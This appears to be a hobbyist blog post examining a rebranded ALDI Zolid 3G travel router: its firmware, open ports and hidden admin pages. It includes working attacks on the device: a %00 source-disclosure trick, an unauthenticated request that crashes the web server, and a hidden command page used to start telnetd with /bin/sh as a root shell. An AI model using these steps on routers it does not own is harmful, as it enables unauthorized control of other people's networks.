Ivo's blog

I recently bought a Zolid “wireless mobile router” at a local ALDI store. It’s a nifty little device with 2xUSB, 2xUTP, and b/g/n wireless. You can plug it directly in a socket or power it through micro usb. It also claims to have support for a wide range of 3G dongles so you can use it as a mobile 3G access point. It resembles some of the Linux plug servers like Sheevaplug and Guruplug. Here are some of my findings:

Versions

The Zolid (an ALDI brand) is a rebranded “Amigo 3R161N”, which is also sold by Solwise as the 3g11nmrw and as the E-Top 3r161n, though I can’t find it on the e-top website

Software details

As I expected, it runs linux:

Linux version 2.6.19 (root@localhost.localdomain) (gcc version 3.4.6-1.3.5) #1 Fri Feb 26 17:00:34 CST 2010

It has firmware “ver1.1.5″ installed.

It uses the “GoAheader-Webs” webserver

It uses Pure-FTPd as FTP server

Firmware

It didn’t ship with a firmware on the CD. Unisupport.net (responsible for Zolid support) doesn’t offer anything for download either, and neither does Amigo. However, Solwise does have two firmwares available at the bottom of their product page.

I haven’t yet succeeded in dissecting the firmware (which helps to find backdoors, exploits, and so on, and may provide an opportunity to create a customized firmware). I think it starts with a “config.dat” file, but I have to research this further.

Hacks, details

Appending a .asp url with %00 (other characters will also work, i.e. ///) will give you the unrendered source of the ASP page. I.e. http://192.168.1.132/status.asp%00

nmap reports the following open ports and fingerprint:

Interesting ports on default.fritz.box (192.168.1.132):
Not shown: 994 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
515/tcp   open  printer
49152/tcp open  unknown
MAC Address: 00:08:A1:C8:C9:C4 (CNet Technology)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=7/14%OT=21%CT=1%CU=32750%PV=Y%DS=1%G=Y%M=0008A1%TM=4C3D6DD
OS:3%P=i686-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=U)OPS(O1=
OS:M5B4NNS%O2=M5B4NNS%O3=M5B4%O4=M5B4NNS%O5=M5B4NNS%O6=M5B4NNS)WIN(W1=16D0%
OS:W2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4N
OS:NS%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=4
OS:0%W=16D0%S=O%A=S+%F=AS%O=M5B4NNS%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(
OS:R=Y%DFI=N%T=40%CD=S)

I have been able to find the following additional pages that are not part of the current navigation:

• opmode.asp
• one_button.asp
• ap_one_button.asp
• wifi_one_button.asp
• tcpipwan.asp
• qos.asp
• downloadserver.asp (*)
• stats.asp

(*) may crash the internal web server.

Crashing the web server is easy (no authentication required):

wget 'http://192.168.1.132/goform/foo

Accessing “config.dat” will offer a download containing, I assume, the devices configuration. It’s probably related to the saveconf.asp page. This file resembles the start of the firmwares I’ve been able to find.

Update

Thanks to info provided by Remco van Mook I’ve found the a page on the Sapido gr-1102 which mentions an “obama.asp” page which also works on the Zolid, it allows you to exexcute arbitrary commands!

Executing /usr/sbin/telnetd -l /bin/sh as command will give you an immediate root shell through telnet.

Related links

• Dutch article about the Zolid
• E-top
• Article about the Solwise version
• Dutch supportsite

Remaining questions

• How can we dissect the firmware?
• Shouldn’t there be sources and licenses be provided somewhere?
• How can we hack/exploit this device?

Please keep an eye on this page for futher updates. Respond in the comments if you have found anything interesting